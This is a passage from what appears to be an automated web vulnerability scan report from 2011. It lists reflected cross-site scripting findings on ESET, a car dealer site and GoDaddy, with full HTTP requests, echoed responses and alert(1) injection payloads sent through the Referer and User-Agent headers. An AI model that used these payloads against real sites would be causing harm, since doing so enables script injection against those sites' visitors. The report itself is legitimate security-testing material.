Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/online-scanner/run

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string literal delimited by double quotation marks (the SiteCatalyst tracking variable s.prop12 in the response below). The payload 87b2c"-alert(1)-"4bfc395c0f4 was submitted in the Referer HTTP header and was echoed unmodified in the application's response; the double quote in the payload terminates the string literal, so the text that follows it is parsed and executed as JavaScript.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Because the injected data arrives in a request header, the flaw is not trivial to exploit against another user: an attacker cannot set a victim's Referer directly through a crafted link or form. Historically, client-side technologies such as Flash could be used to make a victim's browser issue a request carrying an arbitrary HTTP header, and any such technique would probably allow this flaw to be exploited. The Referer is also attacker-influenced without a plugin, because the browser populates it from the URL of the linking page: a victim who follows a link from an attacker-controlled page whose URL carries the payload may deliver it, depending on whether the browser percent-encodes the double quote in the outgoing Referer. These constraints partially mitigate the impact of the vulnerability.

Request

GET /us/online-scanner/run HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=87b2c"-alert(1)-"4bfc395c0f4
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.1.10.1303044897; s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 3923
Date: Sun, 17 Apr 2011 12:59:38 GMT
X-Varnish: 1857996580
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
pageName="Online Scanner - Other Browser";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=87b2c"-alert(1)-"4bfc395c0f4";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

4.277. http://www.eset.com/us/partners [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/partners

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string literal delimited by double quotation marks (the SiteCatalyst tracking variable s.prop12 in the response below). The payload c4c89"-alert(1)-"905792298ce was submitted in the Referer HTTP header and was echoed unmodified in the application's response; the double quote in the payload terminates the string literal, so the text that follows it is parsed and executed as JavaScript.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Because the injected data arrives in a request header, the flaw is not trivial to exploit against another user: an attacker cannot set a victim's Referer directly through a crafted link or form. Historically, client-side technologies such as Flash could be used to make a victim's browser issue a request carrying an arbitrary HTTP header, and any such technique would probably allow this flaw to be exploited. The Referer is also attacker-influenced without a plugin, because the browser populates it from the URL of the linking page: a victim who follows a link from an attacker-controlled page whose URL carries the payload may deliver it, depending on whether the browser percent-encodes the double quote in the outgoing Referer. These constraints partially mitigate the impact of the vulnerability.

Request

GET /us/partners HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=c4c89"-alert(1)-"905792298ce

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 13874
Date: Sun, 17 Apr 2011 14:15:48 GMT
X-Varnish: 1858169361
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>W
...[SNIP]...
the next lines. */
s.pageName="";
s.server="";
s.channel="Partners";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=c4c89"-alert(1)-"905792298ce";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

4.278. http://www.eset.com/us/partners/worldwide-partners [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/partners/worldwide-partners

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string literal delimited by double quotation marks (the SiteCatalyst tracking variable s.prop12 in the response below). The payload 9f790"-alert(1)-"2951c1a0ee7 was submitted in the Referer HTTP header and was echoed unmodified in the application's response; the double quote in the payload terminates the string literal, so the text that follows it is parsed and executed as JavaScript.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Because the injected data arrives in a request header, the flaw is not trivial to exploit against another user: an attacker cannot set a victim's Referer directly through a crafted link or form. Historically, client-side technologies such as Flash could be used to make a victim's browser issue a request carrying an arbitrary HTTP header, and any such technique would probably allow this flaw to be exploited. The Referer is also attacker-influenced without a plugin, because the browser populates it from the URL of the linking page: a victim who follows a link from an attacker-controlled page whose URL carries the payload may deliver it, depending on whether the browser percent-encodes the double quote in the outgoing Referer. These constraints partially mitigate the impact of the vulnerability.

Request

GET /us/partners/worldwide-partners HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=9f790"-alert(1)-"2951c1a0ee7

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 23135
Date: Sun, 17 Apr 2011 14:15:50 GMT
X-Varnish: 1858169476
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
the next lines. */
s.pageName="";
s.server="";
s.channel="Partners";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=9f790"-alert(1)-"2951c1a0ee7";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

4.279. http://www.eset.com/us/press-center [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/press-center

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string literal delimited by double quotation marks (the SiteCatalyst tracking variable s.prop12 in the response below). The payload 9d7e3"-alert(1)-"3cfb654df82 was submitted in the Referer HTTP header and was echoed unmodified in the application's response; the double quote in the payload terminates the string literal, so the text that follows it is parsed and executed as JavaScript.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Because the injected data arrives in a request header, the flaw is not trivial to exploit against another user: an attacker cannot set a victim's Referer directly through a crafted link or form. Historically, client-side technologies such as Flash could be used to make a victim's browser issue a request carrying an arbitrary HTTP header, and any such technique would probably allow this flaw to be exploited. The Referer is also attacker-influenced without a plugin, because the browser populates it from the URL of the linking page: a victim who follows a link from an attacker-controlled page whose URL carries the payload may deliver it, depending on whether the browser percent-encodes the double quote in the outgoing Referer. These constraints partially mitigate the impact of the vulnerability.

Request

GET /us/press-center HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=9d7e3"-alert(1)-"3cfb654df82

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 18385
Date: Sun, 17 Apr 2011 14:15:48 GMT
X-Varnish: 1858169352
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
nel on
the next lines. */
s.pageName="";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=9d7e3"-alert(1)-"3cfb654df82";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

4.280. http://www.eset.com/us/renew [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/renew

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91bf9"-alert(1)-"12531d7b5ed was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/renew HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=91bf9"-alert(1)-"12531d7b5ed

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 18993
Date: Sun, 17 Apr 2011 14:15:49 GMT
X-Varnish: 1858169396
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>R
...[SNIP]...
nel on
the next lines. */
s.pageName="";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=91bf9"-alert(1)-"12531d7b5ed";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

4.281. http://www.eset.com/us/rss [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/rss

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9f54"-alert(1)-"0b6f004dd10 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/rss HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=c9f54"-alert(1)-"0b6f004dd10

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 15197
Date: Sun, 17 Apr 2011 14:15:49 GMT
X-Varnish: 1858169423
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
nel on
the next lines. */
s.pageName="";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=c9f54"-alert(1)-"0b6f004dd10";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

4.282. http://www.eset.com/us/sitemap [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/sitemap

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 936d3"-alert(1)-"a91f278d403 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/sitemap HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=936d3"-alert(1)-"a91f278d403

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 18971
Date: Sun, 17 Apr 2011 14:15:50 GMT
X-Varnish: 1858169450
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
nel on
the next lines. */
s.pageName="";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=936d3"-alert(1)-"a91f278d403";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

4.283. http://www.eset.com/us/store [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/store

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5491d"-alert(1)-"4a921ceb826 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/store HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=5491d"-alert(1)-"4a921ceb826

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 38902
Date: Sun, 17 Apr 2011 14:15:56 GMT
X-Varnish: 1858169795
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>P
...[SNIP]...
n
the next lines. */
s.pageName="";
s.server="";
s.channel="Store";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=5491d"-alert(1)-"4a921ceb826";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

4.284. http://www.gillmanauto.com/index.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.gillmanauto.com
Path:   /index.htm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71adf"><script>alert(1)</script>1fec5e9f872 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /index.htm HTTP/1.1
Host: www.gillmanauto.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=71adf"><script>alert(1)</script>1fec5e9f872

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:17:57 GMT
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
Connection: close
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: ssoid=63d339870a0a00d701afcf208d25b633;path=/
Content-Type: text/html;charset=iso-8859-1
Set-Cookie: JSESSIONID=1qt0ejmih4m4o;path=/
Set-Cookie: lbpoolmember=3607170570.40475.0000; path=/
X-DDC-Arch-Trace: ,HttpResponse,CookieSet
Set-Cookie: ddcpoolid=CmsPoolA;path=/;

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms21.dealer.ddc p7070 -->

   <title>Gillman Acura, Honda, Nissan, Mitsubishi, Chevrolet, Subaru, Chrysler, Jeep, Dodge, GMC,
...[SNIP]...
<img src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=http://www.google.com/search?hl=en&q=71adf"><script>alert(1)</script>1fec5e9f872&amp;20=www.gillmanauto.com&amp;21=/index.htm&amp;50=63d339870a0a00d701afcf208d25b633&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=
...[SNIP]...

4.285. http://www.gillmanauto.com/index.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.gillmanauto.com
Path:   /index.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7633a'-alert(1)-'b4f5a8fc932 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /index.htm HTTP/1.1
Host: www.gillmanauto.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=7633a'-alert(1)-'b4f5a8fc932

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:18:13 GMT
Server: Jetty/5.1.1 (Linux/2.6.18-128.7.1.el5 i386 java/1.5.0_16
Connection: close
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: ssoid=63d376310a0a0043011b315c10d03de5;path=/
Content-Type: text/html;charset=iso-8859-1
Set-Cookie: JSESSIONID=491h82iwsa0mj;path=/
Set-Cookie: lbpoolmember=1728122378.40475.0000; path=/
X-DDC-Arch-Trace: ,HttpResponse,CookieSet
Set-Cookie: ddcpoolid=CmsPoolA;path=/;

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms26.dealer.ddc p7070 -->

   <title>Gillman Acura, Honda, Nissan, Mitsubishi, Chevrolet, Subaru, Chrysler, Jeep, Dodge, GMC,
...[SNIP]...
tact: '',
               portal: '',
               sem: '',
               rlCookie: '',
               region: '',
               keyword: '',
               locality: 'en_US',
               host: '173.193.214.243',
               sessionReferrer: 'http://www.google.com/search?hl=en&q=7633a'-alert(1)-'b4f5a8fc932',
               tcdkwid: '',
               tcdcmpid: '',
               tcdadid: '',
refId: '',
               platform: '',
               version: '',
               skin: '',
               templateExtra: '',
                       type: 10,
           extra: 'INDEX'
       };
               D
...[SNIP]...

4.286. https://www.godaddy.com/gdshop/registrar/search.asp [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/registrar/search.asp

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 7e581<script>alert(1)</script>c42c55d61fb was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

